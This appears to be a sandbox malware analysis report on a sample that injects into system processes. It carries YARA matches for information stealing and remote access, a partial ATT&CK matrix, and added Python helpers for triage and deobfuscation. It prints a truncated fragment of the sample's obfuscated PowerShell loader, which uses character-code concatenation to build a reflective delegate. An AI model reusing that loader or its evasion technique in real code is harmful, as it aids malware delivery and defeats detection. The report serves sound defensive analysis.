                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: ED0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1360000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2BB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 890000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1210000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2630000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2550000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2400000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 20E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1020000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 14E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1140000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: BB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 13D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\Temp\$778e373e base: F70000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe base: 7460000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F675170000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\Temp\$77eec42d base: E50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wscript.exe base: 1F008260000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe base: 75B0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000Jump to behavior
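Read one at a time, the "Memory written" rows above are noise; grouped by the writing process they show dllhost.exe writing dozens of times into the dropped executable under Program Files (x86), into the files dropped under Temp and Roaming and into WMIADAP.exe, and lsass.exe writing into wscript.exe, svchost.exe and the Roaming executable. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses rows in this format (the fused form the page extraction produced, with a trailing "Jump to behavior" link label, is accepted as well) and summarizes them per writing process, flagging Windows system binaries that write into processes outside C:\Windows and targets whose base address lies above 4 GiB (which can only be 64-bit processes). SAMPLE_ROWS is constructed from six rows copied from the table above.

```python
import re
from collections import defaultdict

# Constructed sample: rows copied from the report's "Memory written" table.
# Row 3 is deliberately in the fused form the page extraction produced.
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2640000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\Temp\$778e373e base: F70000Jump to behavior
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F675170000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\wscript.exe base: 1F008260000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
"""

# Source and target are matched lazily, so "dllhost.exeMemory written:" (no separator)
# and "... | Memory written:" both parse; the hex base stops at the first non-hex char.
ROW = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Memory written:\s*(?P<dst>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)"
)


def parse_rows(text):
    """Turn report rows into dicts; the base address becomes an int."""
    rows = []
    for line in text.splitlines():
        m = ROW.search(line)
        if m:
            rows.append({"src": m["src"], "dst": m["dst"], "base": int(m["base"], 16)})
    return rows


def under_windows(path):
    """True for binaries that live under C:\\Windows (case-insensitive)."""
    return path.lower().startswith("c:\\windows\\")


def summarize(rows):
    """Group writes by the writing process and flag the patterns worth a second look."""
    by_src = defaultdict(list)
    for r in rows:
        by_src[r["src"]].append(r)
    out = {}
    for src, writes in by_src.items():
        targets = sorted({w["dst"] for w in writes})
        out[src] = {
            "writes": len(writes),
            "targets": targets,
            # A Windows system binary writing into a process outside C:\Windows is the
            # classic "hijacked system process injects the payload" pattern.
            "outside_windows": [t for t in targets if under_windows(src) and not under_windows(t)],
            # A base above 0xFFFFFFFF cannot exist in a 32-bit process, so the target is 64-bit.
            "above_4gb": sorted({w["dst"] for w in writes if w["base"] > 0xFFFFFFFF}),
        }
    return out


if __name__ == "__main__":
    for src, info in summarize(parse_rows(SAMPLE_ROWS)).items():
        print(f"{src}: {info['writes']} writes into {len(info['targets'])} distinct targets")
        for t in info["outside_windows"]:
            print("  system process -> non-Windows target:", t)
        for t in info["above_4gb"]:
            print("  64-bit target:", t)
```

Feed it the whole table rather than the six sample rows to get the complete writer-to-target map; the per-target write counts are a quick way to tell a single PE image write from the repeated section-by-section writes seen against the Program Files (x86) executable above.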
Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Process created: C:\Users\user\AppData\Local\Temp\$77a3a3b4 "C:\Users\user\AppData\Local\Temp\$77a3a3b4"
Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Process created: C:\Users\user\AppData\Local\Temp\$778e373e "C:\Users\user\AppData\Local\Temp\$778e373e"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe "C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe"
Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Process created: unknown unknown
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:ukpewrgeipej{param([outputtype([type])][parameter(position=0)][type[]]$difffpdugehihq,[parameter(position=1)][type]$pcksoxtjin)$dnnozxtgtcr=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+[char](102)+''+'l'+''+[char](101)+''+[char](99)+''+'t'+''+[char](101)+'dd'+'e'+''+[char](108)+''+[char](101)+'g'+[char](97)+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+'e'+'m'+''+'o'+'r'+[char](121)+''+[char](77)+''+'o'+''+'d'+''+[char](117)+''+'l'+''+'e'+'',$false).definetype(''+'m'+''+'y'+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+'a'+[char](116)+''+[char](101)+''+[char](84)+''+[char](121)+''+'p'+''+[char](101)+'','c'+[char](108)+''+'a'+'s'+'s'+''+','+'p'+'u'+''+[char](98)+''+'l'+''+'i'+'c'+[char](44)+'s'+'e'+'a'+[char](108)+''+[char](101)+'d'+[char](44)+''+[char](65)+''+'n'+''+'s'+''+[char](105)+''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+''+[char](44)+'a'+'u'+''+[char](116)+''+[char](111)+''+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$dnnozxtgtcr.defineconstructor('r'+[char](84)+''+[char](83)+''+[char](112)+''+[char](101)+''+[char](99)+''+'i'+''+[char](97)+''+[char](108)+''+'n'+''+[char](97)+''+[char](109)+''+'e'+','+[char](72)+''+'i'+''+[char](100)+''+[char](101)+'by'+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+'pu'+[char](98)+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$difffpdugehihq).setimplementationflags(''+'r'+''+[char](117)+''+'n'+'tim'+[char](101)+''+[char](44)+''+[char](77)+''+'a'+''+[char](110)+''+'a'+''+[char](103)+''+[char](101)+''+[char](100)+'');$dnnozxtgtcr.definemethod(''+[char](73)+'n'+[char](118)
+''+[char](111)+''+[char](107)+'e','p'+[char](117)+''+'b'+'l'+[char](105)+''+[char](99)+''+[char](44)+'h'+[char](105)+''+[char](100)+''+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+'g'+''+','+''+[char](78)+''+'e'+''+[char](119)+''+'s'+''+[char](108)+''+[char](111)+'t,'+[char](86)+''+[char](105)+''+[char](114)+''+[char](116)+''+[char](117)+''+[char](97)+''+'l'+'',$pcksoxtjin,$difffpdugehihq).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+'i'+'m'+''+[char](101)+','+[char](77)+''+[char](97)+'n'+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');write-output $dnnozxtgtcr.createtype();}$lvayyyanuycks=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+'st'+[char](101)+''+'m'+''+[char](46)+''+[char](100)+''+[char](108)+''+[char](108)+'')}).gettype(''+[char](77)+'i'+'c'+''+[char](114)+'o'+'s'+''+[char](111)+''+'f'+''+[char](116)+''+'.'+''+[char](87)+''+'i'+''+'n'+'3'+[char](50)+''+[char](46)+''+[char](85)+'
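The powershell.exe command line above never writes a string in clear: the dynamic assembly name, module name, delegate type name, the type and method attribute lists, the System.dll lookup and the Microsoft.Win32 type name are all built from `[char](N)` casts and one- or two-character literals glued together with `+`, which is enough to defeat keyword matching on the raw command. The Python below is an added example, not code from the report or from the sample: it folds every such chain back into a single literal and lists the recovered strings, so the DefineDynamicAssembly / DefineDynamicModule / DefineType / DefineConstructor / DefineMethod sequence can be read as ordinary reflective delegate construction. SAMPLE is constructed from fragments copied from the command line as printed on the page; the page shows the command in lower case, so recovered names keep only the case carried by the character codes (`Reflecteddelegate`, `InMemoryModule`, `system.dll`).

```python
import re

# One token of the obfuscated concatenation: [char](N) or a single-quoted literal.
TOKEN = re.compile(r"\[char\]\((\d+)\)|'([^']*)'", re.IGNORECASE)
# A chain is two or more tokens joined with '+'. A lone literal is left alone.
CHAIN = re.compile(
    r"(?:\[char\]\(\d+\)|'[^']*')(?:\s*\+\s*(?:\[char\]\(\d+\)|'[^']*'))+",
    re.IGNORECASE,
)

# Constructed sample: three fragments copied verbatim from the command line above.
SAMPLE = (
    r"$dnnozxtgtcr=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname("
    r"''+[char](82)+''+[char](101)+''+[char](102)+''+'l'+''+[char](101)+''+[char](99)+''+'t'+''+[char](101)+'dd'+'e'+''+[char](108)+''+[char](101)+'g'+[char](97)+''+[char](116)+''+[char](101)+''"
    r")),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule("
    r"''+[char](73)+'n'+[char](77)+'e'+'m'+''+'o'+'r'+[char](121)+''+[char](77)+''+'o'+''+'d'+''+[char](117)+''+'l'+''+'e'+''"
    r",$false);"
    r"$_.location.split('\')[-1].equals('s'+[char](121)+'st'+[char](101)+''+'m'+''+[char](46)+''+[char](100)+''+[char](108)+''+[char](108)+'')"
)


def decode_chain(chain):
    """Evaluate one [char](N) / 'literal' concatenation chain to its plaintext."""
    parts = []
    for m in TOKEN.finditer(chain):
        if m.group(1) is not None:
            parts.append(chr(int(m.group(1))))   # [char](82) -> 'R'
        else:
            parts.append(m.group(2))             # 'dd' -> dd, '' -> nothing
    return "".join(parts)


def deobfuscate(command):
    """Replace every chain with a plain single-quoted literal.

    Returns (rewritten_command, list_of_recovered_strings) in source order.
    """
    found = []

    def repl(m):
        s = decode_chain(m.group(0))
        found.append(s)
        # PowerShell single-quoted strings escape a quote by doubling it.
        return "'" + s.replace("'", "''") + "'"

    return CHAIN.sub(repl, command), found


if __name__ == "__main__":
    rewritten, strings = deobfuscate(SAMPLE)
    for s in strings:
        print("recovered:", s)
    print(rewritten)
```

Running it over the complete command line gives the readable form; the recovered literals (assembly, module and delegate type names, attribute lists, `system.dll`, the Win32 type name that is cut off at the end of the page) are the strings to match on, since the concatenation itself varies from sample to sample. The decoder handles only the two constructs this sample uses; a `[string]::join`, format-operator or `-replace` stage would need its own rule.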
Source: C:\Windows\System32\dllhost.exe | Code function: 7_2_00000001400022F8 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_00000001400022F8
Source: C:\Windows\System32\dllhost.exe | Code function: 7_2_00000001400022F8 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_00000001400022F8
Source: winlogon.exe, 00000008.00000000.2327070503.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.3596102111.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.2333869328.0000011605AB4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: winlogon.exe, 00000008.00000000.2327070503.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.3596102111.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.2334184005.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000008.00000000.2327070503.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.3596102111.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.2334184005.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 00000008.00000000.2327070503.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.3596102111.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.2334184005.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\$778e373e | Code function: 6_2_00FD6CA6 cpuid 6_2_00FD6CA6
Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Queries volume information: C:\Users\user\Desktop\vm6XYZzWOd.exe VolumeInformation
Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\$778e373e | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Queries volume information: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\dllhost.exe | Code function: 7_2_00000001400022F8 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_00000001400022F8
Source: C:\Users\user\AppData\Local\Temp\$778e373e | Code function: 6_2_00FD64E3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00FD64E3
Source: C:\Users\user\AppData\Local\Temp\$778e373e | Code function: 6_2_0040132F VirtualAlloc,VirtualAlloc,CreateEventA,GetUserNameExA,GetVolumeInformationA,select,LocalAlloc,socket,socket,setsockopt,CreateThread,CloseHandle,VirtualFree,VirtualFree,ExitProcess,6_2_0040132F
Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: dllhost.exe | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55615b0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55815d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55815d0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55c15f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.7060000.17.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55615b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.7060000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55c15f0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2329340296.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2314321944.0000000006431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2314321944.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2302555249.0000000005201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 21.2.$77Kaxhwswfup.exe.38c1cd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.3c166a4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.$778e373e.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.3b9b930.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.$77Kaxhwswfup.exe.3937f28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.$778e373e.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.$77Kaxhwswfup.exe.392dd50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.3a3eeb4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.3a7f554.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.2746243713.0000000003935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2300253783.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3549120437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55615b0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55815d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55815d0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55c15f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.7060000.17.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55615b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.7060000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.55c15f0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2329340296.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2314321944.0000000006431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2314321944.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2302555249.0000000005201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 21.2.$77Kaxhwswfup.exe.38c1cd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.3c166a4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.$778e373e.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.3b9b930.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.$77Kaxhwswfup.exe.3937f28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.$778e373e.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.$77Kaxhwswfup.exe.392dd50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.3a3eeb4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vm6XYZzWOd.exe.3a7f554.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.2746243713.0000000003935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2300253783.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3549120437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

The matrix is listed here by tactic column. A leading digit string (for example 713 before Process Injection) is the report's signature-count marker for that technique as rendered on the page; entries without one are the unmarked template cells of the matrix. The last row of the matrix is cut off on the page after its Privilege Escalation cell.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances

Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools

Execution: 1 Native API; 21 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript

